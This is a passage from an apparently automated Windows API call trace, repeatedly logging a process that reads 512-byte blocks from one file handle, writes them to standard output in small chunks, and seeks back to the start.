returned 1 [0209.449] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.449] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.450] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.450] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, 
lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.451] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.451] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] GetFileType (hFile=0x50) returned 0x1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.453] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.453] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] GetFileType (hFile=0x50) returned 0x1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] GetFileType (hFile=0x50) returned 0x1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] GetFileType (hFile=0x50) returned 0x1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] GetFileType (hFile=0x50) returned 0x1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, 
lpOverlapped=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.454] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.454] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] GetFileType (hFile=0x50) returned 0x1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] GetFileType (hFile=0x50) returned 0x1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] GetFileType (hFile=0x50) returned 0x1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] GetFileType (hFile=0x50) returned 0x1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] GetFileType (hFile=0x50) returned 0x1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] GetFileType (hFile=0x50) returned 0x1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.456] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.456] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] GetFileType (hFile=0x50) returned 0x1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] GetFileType (hFile=0x50) returned 0x1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] GetFileType (hFile=0x50) returned 0x1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 
[0209.457] GetFileType (hFile=0x50) returned 0x1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] GetFileType (hFile=0x50) returned 0x1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] GetFileType (hFile=0x50) returned 0x1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] GetFileType (hFile=0x50) returned 0x1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] GetFileType (hFile=0x50) returned 0x1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.457] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.457] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: 
lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.459] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.459] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle 
